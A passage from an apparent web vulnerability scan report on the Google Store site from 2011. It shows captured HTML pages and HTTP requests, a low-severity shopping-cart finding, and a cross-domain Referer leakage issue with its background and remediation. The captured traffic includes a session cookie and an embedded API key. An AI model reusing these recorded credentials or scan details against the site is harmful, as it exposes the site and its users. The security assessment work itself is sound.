<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
   <head>
       <title>Google Online Store</title>
       <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1" />
       <meta name='keywords' content='Google Online Store' />
       <meta name='description' content='Google Online Store' />

<script type="text/javascript">
var r = Math.random();
var t = document.createElement("img");
t.onload = function() {
var t2 = document.createElement("img");
t2.onload = function() {
var t3 = document.createElement("img");
t3.onload = function() { return; };
t3.src = "http://www.google-analytics.com/__utm.gif?label=ct_gs_exp3&random=" + r;
};
t2.src = "http://www.google-analytics.com/__utm.gif?label=ct_gs_exp2&random=" + r;
};
t.src = "http://www.google-analytics.com/__utm.gif?label=ct_gs_exp1&random=" + r;
</script>
<noscript>
<img src="http://www.google-analytics.com/__utm.gif?label=ct_gs_exp_ns" />
</noscript>

<script language="JavaScript" type="text/JavaScript" src="/js/common.js"></script>
    <link href="/css/main.css" rel="stylesheet" type="text/css" />
    <link href="/css/home.css" rel="stylesheet" type="text/css" />
    
    <link rel="stylesheet" href="/css/syat.css" type="text/css" media="screen" />

<script type="text/javascript">
function click(theevent){
try{
firstTracker._trackEvent('product_page', theevent);
}catch(err){ }
}
</script>
   </head>
<body>
<div id="wrapper">
    <div id="header" style="height:70px">




        <a href="/shop.axd/Home"><img src="/images/googlestore_logo.gif" alt="GoogleStore" /></a>

    <div style="width:100%;position:absolute; top:0; right:0px; width:90px; height:52px;">
    <a href="/You+Tube/"><img style="border:0" src="/images/new_top_link.jpg" alt="Check Out the You Tube Items" /></a>
    </div>

    <ul>
    <li><a href="/You+Tube/">You Tube Home</a></li>
    <li><a href="http://www.google.com">Google Search</a></li>
    <li><a href="http://www.google.com/about.html">About Google</a></li>
    </ul>

    </div>

<div id="left_content">



<div class="box-round">
<div class="top"><span><h2 class="side_head">Categories</h2></span></div>
<div class="center-content">
<ul>
</li><li class="nav off" style="position:relative;"><a class="main" style="background:url(/images/category_icons/accessories_off.gif) left no-repeat;" href=/googlesearch.aspx?category=accessories >Accessories</a></li><li class="nav off" style="position:relative;"><a class="main" style="background:url(/images/category_icons/fun_off.gif) left no-repeat;" href=/googlesearch.aspx?category=fun >Fun</a></li><li class="nav off" style="position:relative;"><a class="main" style="background:url(/images/category_icons/kids_off.gif) left no-repeat;" href=/googlesearch.aspx?category=kids >Kids</a></li><li class="nav off" style="position:relative;"><a class="main" style="background:url(/images/category_icons/office_off.gif) left no-repeat;" href=/googlesearch.aspx?category=office >Office</a></li><li class="nav off" style="position:relative;"><a class="main" style="background:url(/images/category_icons/wearables_off.gif) left no-repeat;" href=/googlesearch.aspx?category=wearables >Wearables</a></li><li class="nav off"><a class="main textpopup" onclick="recordOutboundLink(this, 'Outbound Links', 'Zazzle.com LeftNav');return false;" title="Click here to enter the Doodles on Demand experience. Note: You'll be leaving this site and will land on a page hosted by Zazzle.com." style="background:url(/images/category_icons/doodles_off.gif) left no-repeat;" href=http://www.zazzle.com/googledoodles >Doodles on Demand</a></li>
</ul>
</div>
<div class="bottom"><span></span></div>
</div>

<div class="box-round" style="margin-top:10px;">
<div class="top"><span><h2 class="side_head">Eco Reference</h2></span></div>
<div class="center-content">
<ul class="eco_guide">
<li style="background:url(/images/greeninitiative/1.jpg) no-repeat left;">Sustainable</li>
<li style="background:url(/images/greeninitiative/2.jpg) no-repeat left;">Organic</li>
<li style="background:url(/images/greeninitiative/3.jpg) no-repeat left;">Recycled</li>
<li style="background:url(/images/greeninitiative/4.jpg) no-repeat left;">Non-Polluting</li>
</ul>
</div>
<div class="bottom"><span></span></div>
</div>

</div>
<div id="content">

<h1 class="heading_main">Google Store Privacy Notice</h1>
<h2 class="heading_sub1">April 12th, 2007</h2>
   <p>
    The <a href="https://checkout.google.com/files/privacy.html">Google Privacy Policy</a> describes how we treat personal information when you use Google's products and services, including information provided when you visit the Google Store. </p>
</p>
</div>
<div id="right_content">



<style type="text/css">
.signup-tb{
width:135px;
font-size:.9em;
margin-top:5px;
margin-bottom:5px;
}

.signup-btn{
font-size:.9em;
}

.lblMessage{
font-weight:bold;

}

.formsuccess{
font-weight:bold;
color:green;
}

.formerror{
font-weight:bold;
color:red; }
</style>

<div class="box-round" style="margin-bottom:10px;">
<div class="top">
<span>
<h2 class="side_head">Newsletter Signup</h2>
</span>
</div>

<div class="center-content">
<span id="Template_ctlRightNav_ctlSignup_Label1" class="lblMessage">I want to receive promotional email from GatewayCDI.</span><br />
<form name="aspnetForm" method="post" action="#" id="aspnetForm">
<div>
<input type="hidden" name="__VIEWSTATE" id="__VIEWSTATE" value="/wEPDwUENTM4MQ9kFgJmD2QWAmYPZBYCAgUPZBYCZg9kFgICAQ9kFgICAw8PFgIeCEltYWdlVXJsBRYvaW1hZ2VzL2J0bl9zaWdudXAuZ2lmZGQYAQUeX19Db250cm9sc1JlcXVpcmVQb3N0QmFja0tleV9fFgEFKFRlbXBsYXRlJGN0bFJpZ2h0TmF2JGN0bFNpZ251cCRidG5TaWduVXA=" />
</div>

<div>

   <input type="hidden" name="__EVENTVALIDATION" id="__EVENTVALIDATION" value="/wEWAwKig4HRDgKc3s3hCgKHlcOwBw==" />
</div>
<input name="Template$ctlRightNav$ctlSignup$EmailAddress" type="text" maxlength="50" id="Template_ctlRightNav_ctlSignup_EmailAddress" class="signup-tb" />
<input type="image" name="Template$ctlRightNav$ctlSignup$btnSignUp" id="Template_ctlRightNav_ctlSignup_btnSignUp" src="/images/btn_signup.gif" style="border-width:0px;" />
</form>
</div>
<div class="bottom"><span></span></div>
</div>

<div class="box-round">
<div class="top">
<span>
<h2 class="side_head">Store Links</h2>
</span>
</div>
<div class="center-content">
<ul class="store-links">
<li><a href="/shop.axd/Cart" class="shopping-cart">Shopping Cart (0)</a></li>

<li><a href="/shop.axd/Contact">Customer Service</a></li>
<li><a href="/shop.axd/Contact#warranty">Warranty / Returns</a></li>

</ul>

<ul>

<li><a href="/googlesearch.aspx?topseller=yes">Top Sellers</a></li>
<li><a href="/googlesearch.aspx?isnew=yes">What's New</a></li>
<li><a href="/googlesearch.aspx?category=eco">Eco-Friendly Items</a></li>
<li><a href="/googlesearch.aspx?specials=yes">Specials</a></li>
<li><a href="/Mini/"><b>Google Mini</b></a></li>

</ul>
</div>
<div class="bottom"><span></span></div>
</div>

</div>

<div id="footer">


<ul id="navigation_footer_ul">
<li><a href=/Accessories/ >Accessories</a></li><li><a href=/Fun/ >Fun</a></li><li><a href=/Kids/ >Kids</a></li><li><a href=/Office/ >Office</a></li><li><a href=/Wearables/ >Wearables</a></li><li><a class="textpopup" title="Click here to enter the Doodles on Demand experience. Note: You'll be leaving this site and will land on a page hosted by Zazzle.com." onclick="target='_blank'" href=http://www.zazzle.com/googledoodles >Doodles</a></li>
<li><a href="/shop.axd/Contact">Customer Service</a></li>
<li><a href="/shop.axd/Cart">Shopping Cart</a></li>
</ul>
<div id="legal">
Copyright Google Inc. All Rights Reserved.<br />
Use of this service constitutes your acceptance of the Google Store's <a href="/shop.axd/PrivacyPolicy">privacy policy</a>.
</div>

<script type="text/javascript" src="/js/jquery-latest.js"></script>
<script type="text/javascript" src="/js/jquery.dimensions.js"></script>
<script type="text/javascript" src="/js/jquery.tooltip.js"></script>
<script type="text/javascript">
$(document).ready(function(){
$(".ecotags").tooltip({
   showURL: false });
   $(".textpopup").tooltip({showURL: false,effect: "bouncy" });

$("#DoodleDrop").bind("change",function(){
var imgname = $('option:selected',this).attr("id");
var edpNo = '';
if(imgname!=""){
$("#ProductImage").attr("src","/images/DOODLES/"+imgname+"_A.jpg");
}
$("#ProductImageHref").attr("href","javascript:newWindow('/view_large.aspx?img=/images/DOODLES/"+imgname+"_.jpg+&edp_no="+edpNo+"',420,600)");
});

$("#searchfilters select").bind("change",function(){
var url = $('option:selected',this).val();
if(url!=""){window.location = url;}

});

});
</script>

<script src="https://www.google.com/jsapi" type="text/javascript"></script>
<script src="https://ajax.googleapis.com/ajax/libs/googleapis/0.0.4/googleapis.min.js" type="text/javascript"></script>
<script src="https://www.google.com/cse/intl/en-US/sayt.js" type="text/javascript"></script><script type="text/javascript">
var searchText = document.getElementById('q');

var cx = '016458501645884057912:dq_ixbwhuk8';

var key = 'AIzaSyAl0tYGljRQwIcOS13gmbLkH0GssascyR4';
google.load('search', '1');

googleapis.load('shopping', 'v1');
sayt = saytInitialize(cx, key);

google.setOnLoadCallback(function() {
google.search.CustomSearchControl.attachAutoCompletion(
cx, searchText, 'searchForm', sayt.saytSubmit );
});
</script>

</div>
    </div>
    <script type="text/javascript">
var gaJsHost = (("https:" == document.location.protocol) ? "https://ssl." : "http://www.");
document.write("<sc" + "ript src='" + gaJsHost + "google-analytics.com/ga.js' type='text/javascript'>" + "</sc" + "ript>");
</script>

<script type="text/javascript">
var firstTracker = _gat._getTracker("UA-30481-1");
firstTracker._initData();
var ga = ga || {};
ga.special = 'regular';

ga.isNew = 'no';

firstTracker._setCustomVar(1, 'price', ga.special, 3);
firstTracker._setCustomVar(2, 'is new', ga.isNew, 3);
firstTracker._trackPageview();

var secondTracker = _gat._getTracker("UA-735212-16");
secondTracker._setLocalRemoteServerMode();
secondTracker._initData();
secondTracker._trackPageview();

</script>

<div id="backgroundPopup"></div>

   </body>
</html>

2.4. http://www.googlestore.com/shoppingcart.aspx previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://www.googlestore.com
Path:	/shoppingcart.aspx

Request

POST /shoppingcart.aspx?item_no=&cookieCheck=true HTTP/1.1
Host: www.googlestore.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.googlestore.com/shoppingcart.aspx?item_no=&cookieCheck=true
Cookie: ASP.NET_SessionId=4n1rd3u3ovrt2o45f1fvmo45; __utma=148589601.1599814706.1319223601.1319223601.1319223601.1; __utmb=148589601.32.10.1319223601; __utmc=148589601; __utmz=148589601.1319223601.1.1.utmcsr=fakereferrerdominator.com|utmccn=(referral)|utmcmd=referral|utmcct=/referrerPathName; SupportCookies=true
Content-Type: application/x-www-form-urlencoded
Content-Length: 927

__VIEWSTATE=%2FwEPDwUKLTg1NTM5NjY1MA9kFgICBQ9kFgJmD2QWAgIBD2QWAgIDDw8WAh4ISW1hZ2VVcmwFFi9pbWFnZXMvYnRuX3NpZ251cC5naWZkZBgBBR5fX0NvbnRyb2xzUmVxdWlyZVBvc3RCYWNrS2V5X18WBAUQR0NoZWNrb3V0QnV0dG9uMQUQR0NoZWNrb3V0QnV0dG9uMwUQR0NoZWNrb3V0QnV0dG9uMgUfY3RsUmlnaHROYXYkY3RsU2lnbnVwJGJ0blNpZ25VcA%3D%3D&__EVENTVALIDATION=%2FwEWAgLw48iODgKcnpuLBQ%3D%3D&GCheckoutButton1.x=104&GCheckoutButton1.y=19&analyticsdata=X191YWNjdD1VQS0zMDQ4MS0xO19fdXNlcnY9MTtfX3V3dj01LjEuOTtfX3Vmc2M9MTtfX3V0aXRsZT0xO19fdWZsYXNoPTE7X191bWN2YWw9X191dG1hJTNEMTQ4NTg5NjAxLjE1OTk4MTQ3MDYuMTMxOTIyMzYwMS4xMzE5MjIzNjAxLjEzMTkyMjM2MDEuMSUzQl9fdXRtYiUzRDE0ODU4OTYwMS4zMi4xMC4xMzE5MjIzNjAxJTNCX191dG1jJTNEMTQ4NTg5NjAxJTNCX191dG16JTNEMTQ4NTg5NjAxLjEzMTkyMjM2MDEuMS4xLnV0bWNzciUzRGZha2VyZWZlcnJlcmRvbWluYXRvci5jb20lN0N1dG1jY24lM0QlMjhyZWZlcnJhbCUyOSU3Q3V0bWNtZCUzRHJlZmVycmFsJTdDdXRtY2N0JTNEL3JlZmVycmVyUGF0aE5hbWUlM0JfX3V0bXYlM0QlM0JfX3V0bXglM0QlM0JfX3V0bXh4JTNEJTNCOw%3D%3D

Response

HTTP/1.1 302 Found
Cache-Control: private
Content-Length: 201
Content-Type: text/html; charset=utf-8
Location: https://checkout.google.com/view/buy?o=shoppingcart&shoppingcart=167316398544792
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Fri, 21 Oct 2011 19:18:03 GMT

<html><head><title>Object moved</title></head><body>
<h2>Object moved to <a href="https://checkout.google.com/view/buy?o=shoppingcart&shoppingcart=167316398544792">here</a>.</h2>
</body></html>

3. Cross-domain Referer leakage previous next
There are 3 instances of this issue:

/googlesearch.aspx
/shoppingcart.aspx
/shoppingcart.aspx

Issue background

When a web browser makes a request for a resource, it typically adds an HTTP header, called the "Referer" header, indicating the URL of the resource from which the request originated. This occurs in numerous situations, for example when a web page loads an image or script, or when a user clicks on a link or submits a form.

If the resource being requested resides on a different domain, then the Referer header is still generally included in the cross-domain request. If the originating URL contains any sensitive information within its query string, such as a session token, then this information will be transmitted to the other domain. If the other domain is not fully trusted by the application, then this may lead to a security compromise.

You should review the contents of the information being transmitted to other domains, and also determine whether those domains are fully trusted by the originating application.

Today's browsers may withhold the Referer header in some situations (for example, when loading a non-HTTPS resource from a page that was loaded over HTTPS, or when a Refresh directive is issued), but this behaviour should not be relied upon to protect the originating URL from disclosure.

Note also that if users can author content within the application then an attacker may be able to inject links referring to a domain they control in order to capture data from URLs used within the application.

Issue remediation

The application should never transmit any sensitive information within the URL query string. In addition to being leaked in the Referer header, such information may be logged in various locations and may be visible on-screen to untrusted parties.

3.1. http://www.googlestore.com/googlesearch.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.googlestore.com
Path:	/googlesearch.aspx

Issue detail

The page was loaded from a URL containing a query string:

http://www.googlestore.com/googlesearch.aspx?topseller=yes

The response contains the following links to other domains:

http://ajax.googleapis.com/ajax/libs/googleapis/0.0.4/googleapis.min.js
http://www.google-analytics.com/__utm.gif?label=ct_gs_exp_ns
http://www.google.com/
http://www.google.com/about.html
http://www.google.com/cse/intl/en-US/sayt.js
http://www.google.com/jsapi
http://www.zazzle.com/googledoodles
https://ajax.googleapis.com/ajax/libs/googleapis/0.0.4/googleapis.min.js
https://www.google.com/cse/intl/en-US/sayt.js
https://www.google.com/jsapi

Request

GET /googlesearch.aspx?topseller=yes HTTP/1.1
Host: www.googlestore.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.googlestore.com/shop.axd/Home
Cookie: ASP.NET_SessionId=4n1rd3u3ovrt2o45f1fvmo45; __utma=148589601.1599814706.1319223601.1319223601.1319223601.1; __utmb=148589601.2.10.1319223601; __utmc=148589601; __utmz=148589601.1319223601.1.1.utmcsr=fakereferrerdominator.com|utmccn=(referral)|utmcmd=referral|utmcct=/referrerPathName

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 36388
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Fri, 21 Oct 2011 18:59:11 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<head>
<title>Google Online Store :: Product Search</title>
<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1" />
<meta name='keywords' content='Google Online Store' />
<meta http-equiv="pragma" content="no-cache">
<META HTTP-EQUIV="CACHE-CONTROL" CONTENT="NO-CACHE">
<meta name='description' content='Google Online Store' />
<script language="JavaScript" type="text/JavaScript" src="/js/common.js"></script>
<link href="/css/main.css" rel="stylesheet" type="text/css" />
<link href="/css/home.css" rel="stylesheet" type="text/css" />
    

<script type="text/javascript">
var r = Math.random();
var t = document.createElement("img");
t.onload = function() {
var t2 = document.createElement("img");
t2.onload = function() {
var t3 = document.createElement("img");
t3.onload = function() { return; };
t3.src = "http://www.google-analytics.com/__utm.gif?label=ct_gs_exp3&random=" + r;
};
t2.src = "http://www.google-analytics.com/__utm.gif?label=ct_gs_exp2&random=" + r;
};
t.src = "http://www.google-analytics.com/__utm.gif?label=ct_gs_exp1&random=" + r;
</script>
<noscript>
<img src="http://www.google-analytics.com/__utm.gif?label=ct_gs_exp_ns" />
</noscript>

<style type="text/css">
.filterBox a{
line-height:18px;
font-size:11px;
}

.facet_holder
{
margin:8px 0px;
}
.no-results{ font-weight:bold; font-size:1.3em; margin-bottom:25px; text-align:center}
</style>
    <link rel="stylesheet" href="/css/syat.css" type="text/css" media="screen" />

</head>
<body>
<div id="wrapper">
<div id="header" style="height:70px">
<a href="/shop.axd/Home"><img src="/images/googlestore_logo.gif" alt="GoogleStore" /></a>
<div style="position:absolute; top:0; right:0px; width:90px; height:52px;">
<a href="/googlesearch.aspx?category=you tube"><img style="border:0" src="/images/new_top_link.jpg" alt="Check Out the You Tube Items" /></a>
</div>
<ul>
<li><a href="/googlesearch.aspx/?category=youtube">You Tube Home</a></li>
<li><a href="http://www.google.com">Google Search</a></li>
<li><a href="http://www.google.com/about.html">About Google</a></li>
</ul>
</div>

<div id="left_content">
<div id="box-round">
<div class="top"><span><h2 class="side_head">Search Filters</h2></span></div>
<div class="center-content">
<div class="filterBox">
<div id="divsort_holder" class="facet_holder" style="margin-top:0px;">
<b>Sort By:</b><br/>
<div id="divsort" name="divsort"><a href='googlesearch.aspx?'>Best Match</a><br/><a href='googlesearch.aspx?topseller=yes&rankBy=price:ascending'>Price ($-$$$)</a><br/><a href='googlesearch.aspx?topseller=yes&rankBy=price:descending'>Price ($$$-$)</a><br/></div>
</div>

<div id="divcategories_holder" class="facet_holder">
<b>Shop By Category:</b><br/>
<div id="divcategories" name="divcategories"><a href='googlesearch.aspx?topseller=yes&category=Topsellers'>Topsellers(10)</a><br/><a href='googlesearch.aspx?topseller=yes&category=Wearables'>Wearables(7)</a><br/><a href='googlesearch.aspx?topseller=yes&category=Eco'>Eco(5)</a><br/><a href='googlesearch.aspx?topseller=yes&category=Office'>Office(2)</a><br/><a href='googlesearch.aspx?topseller=yes&category=Accessories'>Accessories(1)</a><br/></div>
</div>

<div class="facet_holder">
<b>Shop By Other:</b><br />
<div id="divshop" name="divshop">
<a href="googlesearch.aspx?topseller=yes">Top Sellers</a><br />
<a href="googlesearch.aspx?isnew=yes">What's New</a><br />
<a href="googlesearch.aspx?category=eco">Eco-Friendly Items</a><br />
<a href="googlesearch.aspx?specials=yes">Specials</a>
</div>
</div>
<div id="divsize_holder" class="facet_holder">
<b>Shop By Size:</b><br/>
<div id="divsize" name="divsize"><a href='googlesearch.aspx?topseller=yes&size=2Xl'>2Xl(7)</a><br/><a href='googlesearch.aspx?topseller=yes&size=M'>M(7)</a><br/><a href='googlesearch.aspx?topseller=yes&size=Xl'>Xl(7)</a><br/><a href='googlesearch.aspx?topseller=yes&size=L'>L(6)</a><br/><a href='googlesearch.aspx?topseller=yes&size=S'>S(6)</a><br/><a href='googlesearch.aspx?topseller=yes&size=3Xl'>3Xl(3)</a><br/></div>
</div>
<div id="divcolor_holder" class="facet_holder">

<b>Shop By Color:</b><br/>
<div id="divcolor" name="divcolor"><a href='googlesearch.aspx?topseller=yes&color=Black'>Black(4)</a><br/><a href='googlesearch.aspx?topseller=yes&color=Red'>Red(2)</a><br/><a href='googlesearch.aspx?topseller=yes&color=White'>White(2)</a><br/><a href='googlesearch.aspx?topseller=yes&color=Blue'>Blue(1)</a><br/><a href='googlesearch.aspx?topseller=yes&color=Blue, Green, Red And Yellow'>Blue, Green, Red And Yellow(1)</a><br/><a href='googlesearch.aspx?topseller=yes&color=Green'>Green(1)</a><br/><a href='googlesearch.aspx?topseller=yes&color=Navy'>Navy(1)</a><br/></div>
</div>
</div> 
</div> 

<div class="bottom"><span></span></div>
</div> 
</div> 

<div id="content">
<script language="javascript">
function ajaxGetRequest(url, divName) {
$("#" + divName).empty().html("<div id=\"categoryhead\"><h1>Loading search results</h1><div style=\"height:40px;padding-top:10px;\"><p id=\"indicator\" style=\"margin-top:0px;\"><img src=\"/images/indicator.gif\" /> Loading...</p></div>");

$.ajax({
url: url,
cache: true,
success: function (html) {
var isValid = html.indexOf("<div id=\"\products\">");
if (isValid != -1) {
$("#" + divName).empty().html(html);
} else {
$("#" + divName).empty().html("<div id=\"categoryhead\"><h1>Search results</h1>An error occurred. Try to search on the right-hand navigation for the products you are looking for.</div>");
}
}
})

}
</script>

<div id="products">

<div id="category-head">
<form method="GET" name="search" id="search" action="googlesearch.aspx" style="font-size:15px;">
<b>Search:</b>
<select name="category" style="font-size:13px;">

<option value="all">All Products</option>
<option value="eco" >Eco-Friendly</option>
<option value="wearables" >Wearables</option>
<option value="youtube" >You Tube</option>
<option value="accessories" >Accessories</option>
<option value="office" >Office</option>
<option value="kids" >Kids</option>
<option value="fun" >Fun</option>
<option value="apps" >Apps</option>
</select>

<input name="q" id="q" class="searchbox" style="width:280px; color:#333;" value="keyword / item #" autocomplete="off" onfocus="if(this.value=='keyword / item #')value=''" onblur="if(this.value=='')value='keyword / item #';" type="text"/>
<input type="image" src="/images/btn_search.gif" class="button" value="search" />
</form>

<br />
<a href="/Specials/"><img border="0" src='/content/BannerImages/youtubesalebanner.jpg' alt=''></a>
<br />
<div style="position:relative">

<h1>Displaying All Products</h1>
<div style="clear:left"></div>
</div>

<div id="top_paging">

<div class="paging_top" style="padding-right:15px;">
<div id="pagenav" name="pagename"> <a href='googlesearch.aspx?topseller=yes&start-index=1'>1</a> </div>
</div>
<div id="divbreadcrumbs" name="divbreadcrumbs"><a href='googlesearch.aspx'>Home</a></div>
</div>

<div style="clear:both"> </div>

<div id="divpromotions" name="divpromotions"></div>
<div id="divspell" name="divspell"></div>
<div id="divsearchresults" name="divsearchresults"><table border='0' cellpadding='10' cellspacing='15' class='productTable'><tr><td width='30%' style='padding:5px 0px;'><div style='position:relative; width:99%;'><img class='ecotags' style='float:left;' src='/images/greeninitiative/organic_s.jpg' title='Made from materials grown without the use of harmful synthetic chemicals.'><ul class='subcatItem'><li class='productImage'><a href='/Wearables/Organic+Black+is+Back+T-Shirt.axd'><img src='http://www.googlestore.com/content/images/thumb/go13052b.jpg' width='100' height='100' alt='Organic Black is Back T-Shirt title='Organic Black is Back T-Shirt' border='0' /></a></li><li class='productName'><a href='/Wearables/Organic+Black+is+Back+T-Shirt.axd'>Organic Black is Back T-Shirt</a></li><li class='priceList'><p class='price'>$17.20</p></li></ul></div></td><td width='30%' style='padding:5px 0px;'><div style='position:relative; width:99%;'><img class='ecotags' style='float:left;' src='/images/greeninitiative/organic_s.jpg' title='Made from materials grown without the use of harmful synthetic chemicals.'><ul class='subcatItem'><li class='productImage'><a href='/Wearables/Android+Skateboarder+T-Shirt.axd'><img src='http://www.googlestore.com/content/images/thumb/10-13063b.jpg' width='100' height='100' alt='Android Skateboarder T-Shirt title='Android Skateboarder T-Shirt' border='0' /></a></li><li class='productName'><a href='/Wearables/Android+Skateboarder+T-Shirt.axd'>Android Skateboarder T-Shirt</a></li><li class='priceList'><p class='price'>$15.85</p></li></ul></div></td><td width='30%' style='padding:5px 0px;'><div style='position:relative; width:99%;'><ul class='subcatItem'><li class='productImage'><a href='/Office/Compact+Journal.axd'><img src='http://www.googlestore.com/images/products/dirs/10 53011/10-53011B.jpg' width='100' height='100' alt='Compact Journal title='Compact Journal' border='0' /></a></li><li class='productName'><a href='/Office/Compact+Journal.axd'>Compact Journal</a></li><li class='priceList'><p class='price'>$10.60</p></li></ul></div></td></tr><tr><td width='30%' style='padding:5px 0px;'><div style='position:relative; width:99%;'><ul class='subcatItem'><li class='productImage'><a href='/Wearables/Men+s+Bike+Jersey+-+Rasta.axd'><img src='http://www.googlestore.com/content/images/thumb/10-15006b.jpg' width='100' height='100' alt='Men's Bike Jersey - Rasta title='Men's Bike Jersey - Rasta' border='0' /></a></li><li class='productName'><a href='/Wearables/Men+s+Bike+Jersey+-+Rasta.axd'>Men's Bike Jersey - Rasta</a></li><li class='priceList'><p class='price'>$76.15</p></li></ul></div></td><td width='30%' style='padding:5px 0px;'><div style='position:relative; width:99%;'><ul class='subcatItem'><li class='productImage'><a href='/Office/Pack+of+4+Google+Ballpoint+Pens.axd'><img src='http://www.googlestore.com/content/images/thumb/10-51106b.jpg' width='100' height='100' alt='Pack of 4 Google Ballpoint Pens title='Pack of 4 Google Ballpoint Pens' border='0' /></a></li><li class='productName'><a href='/Office/Pack+of+4+Google+Ballpoint+Pens.axd'>Pack of 4 Google Ballpoint Pens</a></li><li class='priceList'><p class='price'>$3.85</p></li></ul></div></td><td width='30%' style='padding:5px 0px;'><div style='position:relative; width:99%;'><ul class='subcatItem'><li class='productImage'><a href='/Accessories/Cabana+Beach+Towels.axd'><img src='http://www.googlestore.com/images/products/dirs/10 75119/10-75119B.jpg' width='100' height='100' alt='Cabana Beach Towels title='Cabana Beach Towels' border='0' /></a></li><li class='productName'><a href='/Accessories/Cabana+Beach+Towels.axd'>Cabana Beach Towels</a></li><li class='priceList'><p class='price'>$23.45</p></li></ul></div></td></tr><tr><td width='30%' style='padding:5px 0px;'><div style='position:relative; width:99%;'><img class='ecotags' style='float:left;' src='/images/greeninitiative/organic_s.jpg' title='Made from materials grown without the use of harmful synthetic chemicals.'><ul class='subcatItem'><li class='productImage'><a href='/Wearables/Organic+Basic+T-Shirt.axd'><img src='http://www.googlestore.com/content/images/thumb/go13053b.jpg' width='100' height='100' alt='Organic Basic T-Shirt title='Organic Basic T-Shirt' border='0' /></a></li><li class='productName'><a href='/Wearables/Organic+Basic+T-Shirt.axd'>Organic Basic T-Shirt</a></li><li class='priceList'><p class='price'>$18.25</p></li></ul></div></td><td width='30%' style='padding:5px 0px;'><div style='position:relative; width:99%;'><ul class='subcatItem'><li class='productImage'><a href='/Wearables/Ladies+Android+Heart+T-Shirt.axd'><img src='http://www.googlestore.com/content/images/thumb/10-23022b.jpg' width='100' height='100' alt='Ladies Android Heart T-Shirt title='Ladies Android Heart T-Shirt' border='0' /></a></li><li class='productName'><a href='/Wearables/Ladies+Android+Heart+T-Shirt.axd'>Ladies Android Heart T-Shirt</a></li><li class='priceList'><p class='price'>$14.60</p></li></ul></div></td><td width='30%' style='padding:5px 0px;'><div style='position:relative; width:99%;'><img class='ecotags' style='float:left;' src='/images/greeninitiative/organic_s.jpg' title='Made from materials grown without the use of harmful synthetic chemicals.'><ul class='subcatItem'><li class='productImage'><a href='/Wearables/Organic+Cotton+T-Shirt+-+Red.axd'><img src='http://www.googlestore.com/content/images/thumb/10-13092b.jpg' width='100' height='100' alt='Organic Cotton T-Shirt - Red title='Organic Cotton T-Shirt - Red' border='0' /></a></li><li class='productName'><a href='/Wearables/Organic+Cotton+T-Shirt+-+Red.axd'>Organic Cotton T-Shirt - Red</a></li><li class='priceList'><p class='price'>$12.45</p></li></ul></div></td></tr><tr><td width='30%' style='padding:5px 0px;'><div style='position:relative; width:99%;'><ul class='subcatItem'><li class='productImage'><a href='/Wearables/Men+s+Akasha+Jacket.axd'><img src='http://www.googlestore.com/content/images/thumb/10-15008b.jpg' width='100' height='100' alt='Men's Akasha Jacket title='Men's Akasha Jacket' border='0' /></a></li><li class='productName'><a href='/Wearables/Men+s+Akasha+Jacket.axd'>Men's Akasha Jacket</a></li><li class='priceList'><p class='price'>$152.00</p></li></ul></div></td></table></div>

<div class="paging_bottom" id="pagenav_bottom"></div>
</div>
</div>
</div>

<div id="right_content">

<style type="text/css">
.signup-tb{
width:135px;
font-size:.9em;
margin-top:5px;
margin-bottom:5px;
}

.signup-btn{
font-size:.9em;
}

.lblMessage{
font-weight:bold;

}

.formsuccess{
font-weight:bold;
color:green;
}

.formerror{
font-weight:bold;
color:red; }
</style>

<div class="box-round" style="margin-bottom:10px;">
<div class="top">
<span>
<h2 class="side_head">Newsletter Signup</h2>
</span>
</div>

<div class="center-content">
<span id="ctlSignup_Label1" class="lblMessage">I want to receive promotional email from GatewayCDI.</span><br />
<form name="aspnetForm" method="post" action="#" id="aspnetForm">
<div>
